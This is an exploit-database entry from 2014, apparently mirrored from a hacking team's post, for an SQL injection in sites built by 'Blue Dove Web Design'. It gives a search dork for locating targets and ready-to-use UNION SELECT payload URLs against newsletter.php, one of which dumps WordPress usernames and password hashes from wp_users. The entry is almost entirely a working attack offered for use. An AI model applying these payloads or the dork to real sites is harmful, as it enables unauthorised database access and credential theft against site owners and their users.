Blue Dove SQL Injection Vulnerability

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Blue Dove SQL Injection Vulnerability with Exploit Example


                                                ####################################################################
.:. Author : HackXBack [[email protected]]
.:. Team : Sec Attack Team
.:. Home : www.sec-attack.com/vb
.:. Script : Blue Dove Word Press Development

.:. Bug Type : Sql Injection
.:. Dork : &#34;powered by Blue Dove Web Design&#34;

####################################################################

===[ Exploit ]===

http://server/path/file.php?id=null[SQL]

http://server/newsletter/newsletter.php?Id=null[SQL]


===[ Example ]===

http://server/sections/newsletter.php?Id=-30%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14

http://server/newsletter/newsletter_new.php?Id=107+and+1=2+UNION%20SELECT%201,2,3,4,5,concat%28user_login,0x3a,user_pass%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50+from+jam_jam2.wp_users

http://server/newsletter/newsletter.php?Id=-null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,@@version,29,30,31,32,33,34,35,36,37,38,39,40





####################################################################

Greats T0: AtT4CKxT3rR0r1ST & All Member Sec Attack

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1